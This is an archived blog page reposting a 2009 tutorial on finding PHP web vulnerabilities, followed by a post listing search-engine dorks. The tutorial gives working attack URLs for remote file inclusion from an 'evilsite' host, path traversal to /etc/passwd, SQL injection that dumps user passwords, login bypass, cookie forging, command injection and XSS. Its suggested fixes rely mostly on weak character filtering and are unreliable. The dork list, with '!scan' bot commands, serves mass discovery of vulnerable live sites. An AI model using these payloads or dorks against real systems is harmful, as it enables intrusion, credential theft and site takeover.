| 
Selasa, 20 April 2010
di
10.56
 | 
 
 
Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
");Author : SirGod
 Email : sirgod08@gmail.com
 Contents :
 
 1) About
 2) Some stuff
 3) Remote File Inclusion
 3.0 - Basic example
 3.1 - Simple example
 3.2 - How to fix
 4) Local File Inclusion
 4.0 - Basic example
 4.1 - Simple example
 4.2 - How to fix
 5) Local File Disclosure/Download
 5.0 - Basic example
 5.1 - Simple example
 5.2 - How to fix
 6) SQL Injection
 6.0 - Basic example
 6.1 - Simple example
 6.2 - SQL Login Bypass
 6.3 - How to fix
 7) Insecure Cookie Handling
 7.0 - Basic example
 7.1 - Simple example
 7.2 - How to fix
 8) Remote Command Execution
 8.0 - Basic example
 8.1 - Simple example
 8.2 - Advanced example
 8.3 - How to fix
 9) Remote Code Execution
 9.0 - Basic example
 9.1 - Simple example
 9.2 - How to fix
 10) Cross-Site Scripting
 10.0 - Basic example
 10.1 - Another example
 10.2 - Simple example
 10.3 - How to fix
 11) Authentication Bypass
 11.0 - Basic example
 11.1 - Via login variable
 11.2 - Unprotected Admin CP
 11.3 - How to fix
 12) Insecure Permissions
 12.0 - Basic example
 12.1 - Read the users/passwords
 12.2 - Download backups
 12.3 - INC files
 12.4 - How to fix
 13) Cross Site Request Forgery
 13.0 - Basic example
 13.1 - Simple example
 13.2 - How to fix
 14) Shoutz
 
 
 1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
 how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the
 examples without the basic example of each category was founded in different scripts.
 
 
 2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
 You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
 to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
 configuration I use and why :
 
 safe_mode = off ( a lot of shit cannot be done with this on )
 disabled_functions = N/A ( no one,we want all )
 register_globals = on ( we can set variables by request )
 allow_url_include = on ( for lfi/rfi )
 allow_url_fopen = on ( for lfi/rfi )
 magic_quotes_gpc = off ( this will escape ' "  \  and NUL's  with a backslash and we don't want that )
 short_tag_open = on ( some scripts are using short tags,better on )
 file_uploads = on ( we want to upload )
 display_errors = on ( we want to see the script errors,maybe some undeclared variables? )
 
 How to proceed : First,create a database to be used by different scripts.Install the script on
 localhost and start the audit over the source code.If you found something open the web browser and
 test it,maybe you are wrong.
 
 
 3) Remote File Inclusion
 
 
 - Tips : You can use the NULLBYTE and ? trick.
 You can use HTTPS and FTP to bypass filters ( http filtered )
 
 
 In PHP is 4 functions through you can include code.
 
 require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
 require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
 include - includes and evaluates the specified file.
 include_once -  includes and evaluates the specified file during the execution of the script.
 
 
 3.0 - Basic example
 
 
 - Tips : some scripts don't accept "http" in variables,"http" word is forbbiden so
 you can use "https" or "ftp".
 
 - Code snippet from test.php
 
 -----------------------------------------------
 $pagina=$_GET['pagina'];
 include $pagina;
 ?>
 -----------------------------------------------
 
 - If we access the page we got some errors and some warnings( not pasted ) :
 
 Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2
 
 - We can see here that "pagina" variable is undeclared.We can set any value to "pagina" variable.Example :
 
 http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
 
 Now I will show why some people use ? and %00 after the link to the evil script.
 
 # The "%00"
 
 - Code snippet from test.php
 
 -----------------------------------------------
 $pagina=$_GET['pagina'];
 include $pagina.'.php';
 ?>
 -----------------------------------------------
 
 - So if we will request
 
 http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
 
 Will not work because the script will try to include http://evilsite.com/evilscript.txt.php
 
 So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in
 consideration.Example :
 
 http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00
 
 The script will successfully include our evilscript and will throw to junk the things
 after the nullbyte.
 
 # The "?"
 
 - Code snippet from test.php
 
 -----------------------------------------------
 $pagina=$_GET['pagina'];
 include $pagina.'logged=1';
 ?>
 -----------------------------------------------
 
 And the logged=1 will become like a variable.But better use nullbyte.Example :
 
 http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1
 
 The evilscript will be included succesfully.
 
 
 3.1 - Simple example
 
 
 Now an example from a script.
 
 - Code snippet from index.php
 
 ----------------------------------------------------
 if (isset($_REQUEST["main_content"])){
 $main_content = $_REQUEST["main_content"];
 } else if (isset($_SESSION["main_content"])){
 $main_content = $_SESSION["main_content"];
 }
 .......................etc..................
 ob_start();
 require_once($main_content);
 ----------------------------------------------------
 
 We can see that "main_content" variable is requested by $_REQUEST method.The attacker can
 set any value that he want. Below the "main_content" variable is include.So if we make the
 following request :
 
 http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt
 
 Our evil script will be successfully included.
 
 
 3.2 - How to fix
 
 
 Simple way : Don't allow special chars in variables.Simple way : filter the slash "/" .
 Another way : filter "http" , "https" , "ftp" and "smb".
 
 
 4) Local File Inclusion
 
 
 - Tips : You can use the NULLBYTE and ? trick.
 ../ mean a directory up
 On Windows systems we can use "..\" instead of "../" .The "..\" will become "..%5C" ( urlencoded ).
 
 The same functions which let you to include (include,include_once,require,require_once) .
 
 
 4.0 - Basic example
 
 
 - Code snippet from test.php
 
 -----------------------------------
 $pagina=$_GET['pagina'];
 include '/pages/'.$pagina;
 ?>
 -----------------------------------
 
 Now,we can not include our script because we can not include remote files.We can include only
 local files as you see.So if we make the following request :
 
 http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
 
 The script will include "/pages/../../../../../../etc/passwd" successfully.
 
 You can use the %00 and ? .The same story.
 
 
 4.1 - Simple example
 
 
 - Code snippet from install/install.php
 
 -------------------------------------
 if(empty($_GET["url"]))
 $url = 'step_welcome.php';
 else
 $url = $_GET["url"];
 .............etc.............
 
 -------------------------------------
 
 We can see that "url" variable is injectable.If the "url" variable is not set
 (is empty) the script will include "step_welcome.php" else will include the
 variable set by the attacker.
 
 So if we do the following request :
 
 http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd
 
 The "etc/passwd" file will be succesfully included.
 
 
 4.2 - How to fix
 
 
 Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
 Another way : Filter "/" , "\" and "." .
 
 
 5) Local File Disclosure/Download
 
 
 - Tips : Through this vulnerability you can read the content of files,not include.
 
 Some functions which let you to read files :
 
 file_get_contents — Reads entire file into a string
 readfile — Outputs a file
 file — Reads entire file into an array
 fopen — Opens file or URL
 highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
 highlighted version of the code contained in filename using the
 colors defined in the built-in syntax highlighter for PHP.
 show_source — Alias of highlight_file()
 
 
 5.0 - Basic example
 
 
 - Code snippet from test.php
 
 --------------------------------------
 $pagina=$_GET['pagina'];
 readfile($pagina);
 ?>
 --------------------------------------
 
 The readfile() function will read the content of the specified file.So if we do the following request :
 
 http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
 
 The content of etc/passwd will be outputed NOT included.
 
 
 5.1 - Simple example
 
 
 - Code snippet from download.php
 
 -----------------------------------------------------------------------------------
 $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
 header("Pragma: public");
 header("Expires: 0");
 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
 
 header("Content-Type: application/force-download");
 header( "Content-Disposition: attachment; filename=".basename($file));
 
 //header( "Content-Description: File Transfer");
 @readfile($file);
 die();
 -----------------------------------------------------------------------------------
 
 The "file" variable is unsecure.We see in first line that it is requested by $_REQUEST method.
 And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
 If we make the following request :
 
 http://127.0.0.1/download.php?file=../../../../../../etc/passwd
 
 So we can succesfully read the "etc/passwd" file.
 
 
 5.2 - How to fix
 
 
 Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
 Another way : Filter "/" , "\" and "." .
 
 
 6) SQL Injection
 
 
 - Tips : If the user have file privileges you can read files.
 If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
 you can upload you code into a file.
 
 
 6.0 - Basic example
 
 
 - Code snippet from test.php
 
 ----------------------------------------------------------------------------------
 $id = $_GET['id'];
 $result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
 ?>
 ----------------------------------------------------------------------------------
 
 The "id" variable is not filtered.We can inject our SQL code in "id" variable.Example :
 
 http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--
 
 And we get the "etc/passwd" file if magic_quotes = off ( escaping ' ) and users have
 file privileges.
 
 
 6.1 - Simple example
 
 
 - Code snippet from house/listing_view.php
 
 -----------------------------------------------------------------------------------------------------------------------------
 $id = $_GET['itemnr'];
 require_once($home."mysqlinfo.php");
 $query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
 $result = mysql_query($query);
 if(mysql_num_rows($result)){
 $r = mysql_fetch_array($result);
 -----------------------------------------------------------------------------------------------------------------------------
 
 We see that "id" variable value is the value set for "itemnr" and is not filtered in any way.
 So we can inject our code.Lets make a request :
 
 http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--
 
 And we get the email and the password from the users table.
 
 
 6.2 - SQL Injection Login Bypass
 
 
 - Code snippet from /admin/login.php
 
 ------------------------------------------------------------------------------------------------------------------------------
 $postbruger = $_POST['username'];
 $postpass = md5($_POST['password']);
 $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
 or die("
 " . mysql_error() . "\n"); ------------------------------------------------------------------------------------------------------------------------------
 
 The variables isn't properly checked.We can bypass this login.Lets inject the following username and password :
 
 username : admin ' or ' 1=1
 password : sirgod
 
 We logged in.Why?Look,the code will become
 
 ---------------------------------------------------------------------------------------------------------------------------------
 $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1  AND password = 'sirgod'")
 ---------------------------------------------------------------------------------------------------------------------------------
 
 Login bypassed.The username must be an existent username.
 
 
 6.3 - How to fix
 
 
 Simple way : Don't allow special chars in variables.For numeric variables
 use (int) ,example $id=(int)$_GET['id'];
 Another way : For non-numeric variables : filter all special chars used in
 SQLI : - , . ( ) ' " _ + / *
 
 
 7) Insecure Cooke Handling
 
 
 - Tips : Write the code in the URLbar,don't use a cookie editor for this.
 
 
 7.0 - Basic example
 
 
 - Code snippet from test.php
 
 ---------------------------------------------------------------
 if($_POST['password'] == $thepass) {
 setcookie("is_user_logged","1");
 } else { die("Login failed!"); }
 ............ etc .................
 if($_COOKIE['is_user_logged']=="1")
 { include "admin.php"; else { die('not logged'); }
 ---------------------------------------------------------------
 
 Something interesting here.If we set to the "is_user_logged" variable
 from cookie value "1" we are logged in.Example :
 
 javascript:document.cookie = "is_user_logged=1; path=/";
 
 So practically we are logged in,we pass the check and we can access the admin panel.
 
 
 7.1 - Simple example
 
 
 - Code snippet from admin.php
 
 ----------------------------------------------------------------
 if ($_COOKIE[PHPMYBCAdmin] == '') {
 if (!$_POST[login] == 'login') {
 die("Please Login:
 
 } elseif($_POST[password] == $bcadminpass) {
 setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
 header("Location: admin.php"); } else { die("Incorrect"); }
 }
 ----------------------------------------------------------------
 
 Code looks exploitable.We can set a cookie value that let us to bypass the login
 and tell to the script that we are already logged in.Example :
 
 javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";
 
 What is 1246371700? Is the current time() echo'ed + 360.
 
 
 7.2 - How to fix
 
 
 Simple way : The most simple and eficient way : use SESSIONS .
 
 
 8) Remote Command Execution
 
 
 - Tips : If in script is used exec() you can't see the command output(but the command is executed)
 until the result isn't echo'ed from script.
 You can use AND operator ( || ) if the script execute more than one command .
 
 In PHP are some functions that let you to execute commands :
 
 exec — Execute an external program
 passthru — Execute an external program and display raw output
 shell_exec — Execute command via shell and return the complete output as a string
 system — Execute an external program and display the output
 
 
 8.0 - Basic example
 
 - Code snippet from test.php
 
 ---------------------------------
 $cmd=$_GET['cmd'];
 system($cmd);
 ?>
 ---------------------------------
 
 So if we make the following request :
 
 http://127.0.0.1/test.php?cmd=whoami
 
 The command will be executed and the result will be outputed.
 
 
 8.1 - Simple example
 
 
 - Code snippet from dig.php
 
 -------------------------------------------------------------------------------------------
 $status = $_GET['status'];
 $ns  = $_GET['ns'];
 $host   = $_GET['host'];
 $query_type   = $_GET['query_type']; // ANY, MX, A , etc.
 $ip     = $_SERVER['REMOTE_ADDR'];
 $self   = $_SERVER['PHP_SELF'];
 ........................ etc ........................
 $host = trim($host);
 $host = strtolower($host);
 echo("Executing : dig @$ns $host $query_type
 ");
 echo '
 ';
';system ("dig @$ns $host $query_type");
 -------------------------------------------------------------------------------------------
 
 The "ns" variable is unfiltered and can be specified by the attacker.An attacker can use any command
 that he want through this variable.
 
 Lets make a request :
 
 http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging
 
 The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and
 will not work of course.Lets do something a little bit tricky.We have the AND operator
 ( || ) and we will use it to separe the commands.Example :
 
 http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging
 
 Our command will be executed.The command become "dig ||whoami|| sirgod.net NS".
 
 
 8.2 - Advanced example
 
 
 - Code snippet from add_reg.php
 
 -------------------------------------------------------
 $user = $_POST['user'];
 $pass1 = $_POST['pass1'];
 $pass2 = $_POST['pass2'];
 $email1 = $_POST['email1'];
 $email2 = $_POST['email2'];
 $location = $_POST['location'];
 $url = $_POST['url'];
 $filename = "./sites/".$user.".php";
 ...................etc......................
 $html = "		  \$regdate = \"$date\";
 \$user = \"$user\";
 \$pass = \"$pass1\";
 \$email = \"$email1\";
 \$location = \"$location\";
 \$url = \"$url\";
 ?>";
 $fp = fopen($filename, 'a+');
 fputs($fp, $html) or die("Could not open file!");
 -------------------------------------------------------
 
 We can see that the script creates a php file in "sites" directory( ourusername.php ).
 The script save all the user data in that file so we can inject our evil code into one
 field,I choose the "location" variable.
 
 So if we register as an user with the location (set the "location" value) :
 
 
 
 the code inside sites/ourusername.php will become :
 
 -------------------------------------------------
 $regdate = "13 June 2009, 4:16 PM";
 $user = "pwned";
 $pass = "pwned";
 $email = "pwned@yahoo.com";
 $location = "";
 $url = "http://google.ro";
 ?>
 -------------------------------------------------
 
 So we will get an parse error.Not good.We must inject a proper code to get the result that we want.
 
 Lets inject this code :
 
 \";?>
 So the code inside sites/ourusername.php will become :
 
 --------------------------------------------------------------
 $regdate = "13 June 2009, 4:16 PM";
 $user = "pwned";
 $pass = "pwned";
 $email = "pwned@yahoo.com";
 $location = "";?>          $url = "http://google.ro";
 ?>
 --------------------------------------------------------------
 
 and we will have no error.Why?See the code :
 
 $location = "";?>
 Lets split it :
 
 -------------------------------
 $location = "";
 ?>
 
 -------------------------------
 
 We set the location value to "",close the first php tags,open the tags
 again,wrote our evil code,close the tags and open other and add a variable
 "xxx" because we dont want any error.I wrote that code because I want no
 error,can be modified to be small but will give some errors(will not
 stop us to execute commands but looks ugly).
 
 So if we make the following request :
 
 http://127.0.0.1/sites/ourusername.php?cmd=whoami
 
 And our command will be succesfully executed.
 
 
 8.3 - How to fix
 
 
 Simple way : Don't allow user input .
 Another way : Use escapeshellarg() and escapeshellcmd() functions .
 Example : $cmd=escapeshellarg($_GET'cmd']);
 
 
 9) Remote Code Execution
 
 
 - Tips : You must inject valid PHP code including terminating statements ( ; ) .
 
 
 9.0 - Basic example
 
 
 - Code snippet from test.php
 
 -----------------------------------
 $code=$_GET['code'];
 eval($code);
 ?>
 -----------------------------------
 
 The "eval" function evaluate a string as PHP code.So in this case we are able to execute
 our PHP code.Examples :
 
 http://127.0.0.1/test.php?code=phpinfo();
 http://127.0.0.1/test.php?code=system(whoami);
 
 And we will see the output of the PHP code injected by us.
 
 
 9.1 - Simple example
 
 
 - Code snippet from system/services/init.php
 
 ------------------------------------------------
 $conf = array_merge($conf,$confweb);
 }
 @eval(stripslashes($_REQUEST['anticode']));
 if ( $_SERVER['HTTP_CLIENT_IP'] )
 ------------------------------------------------
 
 We see that the "anticode" is requested by $_REQUEST method and the coder
 "secured" the input with "stripslashes" which is useless here,we don't need
 slashes to execute our php code only if we want to include a URL.So we can
 inject our PHP code.Example :
 
 http://127.0.0.1/test.php?anticode=phpinfo();
 
 Great,injection done,phpinfo() result printed.No include because slashes are
 removed,but we can use system() or another function to execute commands.
 
 
 9.2 - How to fix
 
 
 Simple way : Don't allow ";" and the PHP code will be invalid.
 Another way : Don't allow any special char like "(" or ")" etc.
 
 
 10) Cross-Site Scripting
 
 
 - Tips : You can use alot of vectors,can try alot of bypass methods,you cand
 find them around the web.
 
 
 10.0 - Basic example
 
 
 - Code snippet from test.php
 
 ---------------------------------
 $name=$_GET['name'];
 print $name;
 ?>
 ---------------------------------
 
 The input is not filtered,an attacker can inject JavaScript code.Example :
 
 http://127.0.0.1/test.php?name=
 
 A popup with XSS message will be displayed.JavaScript code succesfully executed.
 
 
 10.1 - Another example
 
 
 - Code snippet from test.php
 
 -------------------------------------------
 $name=addslashes($_GET['name']);
 print '
 ?>
 -------------------------------------------
 
 Not an advanced example,only a bit complicated.
 
 http://127.0.0.1/test.php?name=">
 
 Why this vector?We put " because we must close the " from the "name" atribut
 of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because
 we want to bypass addslashes() function.Injection done.
 
 
 10.2 - Simple example
 
 
 - Code snippet from modules.php
 
 ---------------------------------------------------------------------------
 if (isset($name)) {
 .................... etc................
 } else {
 die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
 ---------------------------------------------------------------------------
 
 The "name" variable is injectable,input is not filtered,so we can inject
 with ease JavaScript code.Example :
 
 http://127.0.0.1/test.php?name=
 
 
 10.3 - How to fix
 
 
 Simple way : Use htmlentities() or htmlspecialchars() functions.
 Example : $name=htmlentities($_GET['name']);
 Another way : Filter all special chars used for XSS ( a lot ).
 The best way is the first method.
 
 
 11) Authentication Bypass
 
 
 - Tips : Look deep in the scripts,look in the admin directories,
 maybe are not protected,also look for undefined variables
 like "login" or "auth".
 
 
 11.0 - Basic example
 
 
 I will provide a simple example of authentication bypass
 via login variable.
 
 - Code snippet from test.php
 
 ---------------------------------
 if ($logged==true) {
 echo 'Logged in.'; }
 else {
 print 'Not logged in.';
 }
 ?>
 ---------------------------------
 
 Here we need register_gloabals = on . I will talk about php.ini
 settings a bit later in this tutorial.If we set the value of $logged
 variable to 1 the if condition will be true and we are logged in.
 Example :
 
 http://127.0.0.1/test/php?logged=1
 
 And we are logged in.
 
 
 11.1 - Via login variable
 
 
 - Code snippet from login.php
 
 ------------------------------------------------------------------------------------
 if ($login_ok)
 {
 $_SESSION['loggato'] = true;
 echo "
 $txt_pass_ok"; echo"";
 }
 ------------------------------------------------------------------------------------
 
 Lets see.If the "login_ok" variable is TRUE ( 1 ) the script set us a SESSION who
 tell to the script that we are logged in.So lets set the "login_ok" variable to TRUE.
 Example :
 
 http://127.0.0.1/login.php?login_ok=1
 
 Now we are logged in.
 
 
 11.2 - Unprotected Admin CP
 
 
 You couln't belive this but some PHP scrips don't protect the admin
 control panel : no login,no .htaccess,nothing.So we simply we go to
 the admin panel directory and we take the control of the website.
 Example :
 
 http://127.0.0.1/admin/files.php
 
 We accessed the admin panel with a simple request.
 
 
 11.3 - How to fix
 
 
 - Login variable bypass : Use a REAL authentication system,don't check the
 login like that,use SESSION verification.Example :
 
 if($_SESSION['logged']==1) {
 echo 'Logged in'; }
 else { echo 'Not logged in';
 }
 
 - Unprotected Admin CP : Use an authentication system or use .htaccess to
 allow access from specific IP's or .htpasswd to
 request an username and a password for admin CP.
 Example :
 
 .htaccess :
 
 order deny, allow
 deny from all
 allow from 127.0.0.1
 
 .htpasswd :
 
 AuthUserFile /the/path/.htpasswd
 AuthType Basic
 AuthName "Admin CP"
 Require valid-user
 
 and /the/path/.htpasswd
 
 sirgod:$apr1$wSt1u...$6yvagxWk.Ai2bD6s6O9iQ.
 
 
 12) Insecure Permissions
 
 
 Tips : Look deep into the files,look if the script request to be
 logged in to do something,maybe the script don't request.
 Watch out for insecure permissions,maybe you can do admin
 things without login.
 
 
 12.0 - Basic example
 
 
 We are thinking at a script who let the admin to have a lookup in
 the users database through a file placed in /admin directory.That
 file is named...hmmm : db_lookup.php.
 
 - Code snippet from admin/db_lookup.php
 
 --------------------------------------------
 // Lookup in the database
 readfile('protected/usersdb.txt');
 ?>
 --------------------------------------------
 
 Lets think.We cannot access the "protected" directory because
 is .htaccess'ed.But look at this file,no logged-in check,nothing.
 So if we acces :
 
 http://127.0.0.1/admin/db_lookup.php
 
 We can see the database.Remember,this is only an example created by
 me,not a real one,you can find this kind of vulnerabilities in scripts.
 
 
 12.1 - Read the users/passwords
 
 
 Oh yeah,some coders are so stupid.They save the usernames and passwords
 in text files,UNPROTECTED.A simple example from a script :
 
 http://127.0.0.1/userpwd.txt
 
 And we read the file,the usernames and passwords are there.
 
 
 12.2 - Download Backups
 
 
 Some scripts have database backup functions,some are safe,some are not safe.
 I will show you a real script example :
 
 - Code snippet from /adminpanel/phpmydump.php
 
 --------------------------------------------------------------------------------
 function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {
 $con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect");
 $db=@mysql_select_db($dbname,$con) or die("Could not select db");
 .............................. etc ..........................
 mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
 --------------------------------------------------------------------------------
 
 After a lof of code the function is called.I don't pasted the entire code
 because is huge.I analyzed the script,no login required,no check,nothing.So
 if we access the file directly the download of the backup will start.Example :
 
 http://127.0.0.1/adminpanel/phpmydump.php
 
 Now we have the database backup saved in our computer.
 
 
 12.3 - INC files
 
 
 Some scripts saves important data in INC files.Usually in INC files is PHP
 code containing database configuration.The INC files can be viewed in
 browser even they contain PHP code.So a simple request will be enough to
 access and read the file.Example :
 
 http://127.0.0.1/inc/mysql.inc
 
 Now we have the database connection details.Look deep in scripts,is more
 scripts who saves important data into INC files.
 
 
 12.4 - How to fix
 
 
 - Basic example : Check if the admin is logged in,if not,redirect.
 
 - Read the users/passwords : Save the records in a MySQL database
 or in a protected file/directory.
 
 - Download Backups : Check if the admin is logged in,if not,redirect.
 
 - INC files : Save the configuration in proper files,like .php or
 protect the directory with an .htaccess file.
 
 
 13) Cross Site Request Forgery
 
 
 - Tips : Through CSRF you can change the admin password,is not
 so inofensive.
 Can be used with XSS,redirected from XSS.
 
 
 13.0 - Basic example
 
 
 - Code snippet from test.php
 
 -----------------------------------------
 check_auth();
 if(isset($_GET['news']))
 { unlink('files/news'.$news.'.txt'); }
 else {
 die('File not deleted'); }
 ?>
 -----------------------------------------
 
 In this example you will see what is CSRF and how it works.In the "files"
 directory are saved the news written by the author.The news are saved like
 "news1.txt","news2.txt" etc. So the admin can delete the news.The news that
 he want to delete will be specified in "news" variable.If he want to delete
 the news1.txt the value of "news" will be "1".We cannot execute this without
 admin permissions,look,the script check if we are logged in.
 I will show you an example.If we request :
 
 http://127.0.0.1/test.php?news=1
 
 The /news/news1.txt file will be deleted.The script directly delete the file
 without any notice.So we can use this to delete a file.All we need is to trick
 the admin to click our evil link and the file specified by us in the "news"
 variable will be deleted.
 
 
 13.1 - Simple example
 
 
 In a way the codes below are included in the index.php file ,I
 will not paste all the includes,there are a lot.
 
 - Code snippet from includes/pages/admin.php
 
 --------------------------------------------------------------------
 if ($_GET['act'] == '') {
 include "includes/pages/admin/home.php";
 } else {
 include "includes/pages/admin/" . $_GET['act'] . ".php";
 --------------------------------------------------------------------
 
 Here we can see how the "includes/pages/admin/members.php" is included in
 this file.If "act=members" the file below will be included.
 
 
 - Code snippet from includes/pages/admin/members.php
 
 ----------------------------------------------------------------------------------------------
 if ($_GET['func'] == 'delete') {
 $del_id = $_GET['id'];
 $query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";
 $result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");
 while ($results2121 = mysql_fetch_array($result2121)) {
 $their_role = $results2121['ROLE'];
 }
 if ($their_role != '1') {
 mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error
 ());
 ----------------------------------------------------------------------------------------------
 
 We can see here that if "func=delete" will be called by URL,the script will
 delete from the database a user with the specified ID ( $id ) without any
 confirmation.Example :
 
 http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4
 
 The script check if the admin is logged in so if we trick the admin to click
 our evil link the user who have the specified ID in the database will be deleted
 without any confirmation.
 
 
 13.2 - How to fix
 
 
 - Simple way : Use tokens.At each login,generate a random token and save it
 in the session.Request the token in URL to do administrative
 actions,if the token missing or is wrong,don't execute the
 action.I will show you only how to to check if the token
 is present and is correct.Example :
 
 -------------------------------------------------------
 check_auth();
 if(isset($_GET['news']) && $token=$_SESSION['token'])
 { unlink('files/news'.$news.'.txt'); }
 else {
 die('Error.'); }
 ?>
 -------------------------------------------------------
 
 The request will look like this one :
 
 http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]
 
 So this request will be fine,the news will be deleted.
 
 
 - Another way : Do some complicated confirmations or request a password
 to do administrative actions.
 
 
 14) Shoutz
 
 
 Shoutz to all www.insecurity.ro & www.h4cky0u.org members.If you have some suggestions or
 questions just email me.
 
 sources : http://milw0rm.com/papers/381
 
 # milw0rm.com [2009-09-09]
 
 Read More..
Diposting oleh
Jericho PS
 
Jumat, 07 Agustus 2009
di
10.25
 | 
 
 
duhh dah lama ga nulis. maen-maen juga ya ke http://jericho.at.uaRead More..
Diposting oleh
Jericho PS
 
Jumat, 01 Mei 2009
di
04.52
 | 
 
 
Beberapa SQL injection dork:
 !scan side.php?arq= allinurl:.php?arq=
 !scan side.php?table= allinurl:.php?table=
 !scan side.php?vis= allinurl:.php?vis=
 !scan side.php?vis= allinurl:side.php?vis=
 !scan site.php?arq= allinurl:.php?arq=
 !scan site.php?meio= allinurl:.php?meio=
 !scan site.php?table= allinurl:.php?table=
 !scan s.php?table= allinurl:.php?table=
 !scan start.php?id= allinurl:".php?id="
 !scan start.php?id= allinurl:"start.php?id="
 !scan start.php?id= allinurl:start.php?id=
 !scan start.php?lang= allinurl:".php?lang="
 !scan start.php?lang= allinurl:"start.php?lang="
 !scan start.php?lang= allinurl:start.php?lang=
 !scan start.php?lang= .php?lang=
 !scan start.php?lang= start.php?lang=
 !scan start.php?mod= allinurl:".php?mod="
 !scan start.php?mod= allinurl:"start.php?mod="
 !scan start.php?page= allinurl:".php?page="
 !scan start.php?page= allinurl:"start.php?page="
 !scan start.php?page= start.php?page=
 !scan start.php?pag= start.php?pag=
 !scan start.php?pg= start.php?pg=
 !scan start.php?p= start.php?p=
 !scan start.php?s= allinurl:".php?s="
 !scan start.php?s= allinurl:"start.php?s="
 !scan start.php?s= allinurl:start.php?s=
 !scan start.php?s= start.php?s=
 !scan str.php?lang= str.php?lang=
 !scan str.php?ln= str.php?ln=
 !scan str.php?l= str.php?l=
 !scan str.php?page= str.php?page=
 !scan str.php?p= str.php?p=
 !scan sub.php?menu= "sub.php?menu="
 !scan sub.php?menu= sub.php?menu=
 !scan sub.php?s= "sub.php?s="
 !scan sub.php?s= sub.php?s=
 !scan sub.php?sub= "sub.php?sub="
 !scan sub.php?sub= sub.php?sub=
 !scan task.php?task= allinurl:.php?task=
 !scan task.php?task= allinurl:task.php?task=
 !scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery
 !scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5
 !scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5
 !scan trans.php?trans= allinurl:".php?trans="
 !scan trans.php?trans= allinurl:"trans.php?trans="
 !scan /trans/trans.php?trans=eng&page= allinurl:".php?trans="
 !scan /trans/trans.php?trans=en&page= allinurl:".php?trans="
 !scan /trans/trans.php?trans=fr&page= allinurl:".php?trans="
 !scan /trans/trans.php?trans=ko&page= allinurl:".php?trans="
 !scan /trans/trans.php?trans=&page= allinurl:".php?trans="
 !scan /trans/trans.php?trans=&p= allinurl:".php?trans="
 !scan view.php?sub= "view.php?sub="
 !scan view.php?sub= view.php?sub=
 !scan view.php?table= allinurl:.php?table=
 !scan voir.php?inc= allinurl:".php?adid="
 !scan werbungFrame.php?do= allinurl:".php?do="
 !scan /ws/get_events.php?includedir= "WebCalendar"
 !scan /ws/get_events.php?includedir= Web Calendar
 !scan /ws/get_events.php?includedir= WebCalendar
 !scan /ws/get_events.php?includedir= WebCalendar v0.9.45
 !scan /ws/get_reminders.php?includedir= WebCalendar
 !scan /ws/get_reminders.php?includedir= WebCalendar v0.9.45
 !scan /ws/login.php?includedir= WebCalendar
 !scan /ws/login.php?includedir= WebCalendar v0.9.45
 !scan ocp-103/index.php?req_path= ocPortal
 !scan images/evil.php?owned= e107
 !scan index.php?ver= allinurl:.php?ver=
 !scan index.php?ver= allinurl:".php?ver="
 !scan index.php?ver= .php?ver=
 !scan /index.php?vis= allinurl:/index.php?vis=
 !scan /index.php?vis= allinurl:.php?vis=
 !scan index.php?way= index.php?way=
 !scan index.php?way= .php?way=
 !scan index.php?wpage= allinurl:"index.php?wpage="
 !scan index.php?wpage= allinurl:".php?wpage="
 !scan info.php?ln= allinurl:"info.php?ln="
 !scan info.php?ln= allinurl:info.php?ln=
 !scan info.php?ln= allinurl:".php?ln="
 !scan /interna.php?meio= allinurl:".php?meio="
 !scan kalender.php?vis= allinurl:"kalender.php"
